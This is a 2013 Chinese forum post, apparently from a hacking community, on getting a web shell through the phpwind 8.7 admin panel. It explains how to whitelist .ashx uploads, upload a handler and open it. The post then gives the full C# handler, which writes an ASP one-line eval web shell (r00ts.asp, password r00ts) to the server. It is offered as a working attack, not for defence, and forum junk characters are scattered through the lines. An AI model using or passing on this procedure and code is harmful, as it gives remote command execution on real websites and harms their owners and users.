找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2217|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小6 C' ^  R0 M5 _6 [5 C! m( Q
. }1 X% {; r' z- ~
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx9 w/ A, ~/ B( `$ V9 i  A3 `
1 A( ^0 t- M+ R
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整/ s4 ^, U9 J, y$ g

1 l8 O+ _$ f/ c7 a5 x然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
. z+ r' t) q3 B8 d' b' z
& r6 p% \# n' S9 E+ o" I" P打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
( _3 ]  S1 c/ O) d; o' Z % S4 I" w/ |# o: I, C* p
下面是代码:
$ T8 S! _8 r5 X, c% Q( |' Y 0 ~3 I# V2 q; v$ z9 p! a
<%@ WebHandler Language="C#"Class="Handler" %>: M4 m" ?/ f# C( e, A6 {# n- u
using System;# n! v. `, p0 K/ \
using System.Web;
9 i' f! c. x' kusing System.IO;
6 Q! A- X: j& u* t  e. Vpublic class Handler : IHttpHandler {
& a# x7 [( d# Apublic void ProcessRequest (HttpContext context) {
5 i: D  p7 b% @. R" V& A! Mcontext.Response.ContentType = "text/plain";
) p2 \' D1 k5 iStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
3 z2 C; \/ D) Hfile1.Write("<%eval request(\"r00ts\")%>");
8 k6 d+ V$ \4 P/ l" w* Q, l  S1 e+ ifile1.Flush();
: y+ P% Q; ]1 ^3 z, f8 T7 C& d1 @3 v0 afile1.Close();4 `1 b+ F0 M, d
}
  F1 x7 p9 E- I) H" Spublic bool IsReusable {5 l' _. r+ c$ n9 _2 u7 O1 y" Y8 Q. Y5 `
get {) I5 r' z  l4 \, K
return false;6 ]; s; M2 S: N8 g& t
}
4 X# Q' U+ f5 z% S6 N" a4 B+ @4 |* S1 x}
" s- U$ f$ G; x. {# `}1 V5 t1 k: `- K" R4 c1 A3 c8 I8 e5 z9 ~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表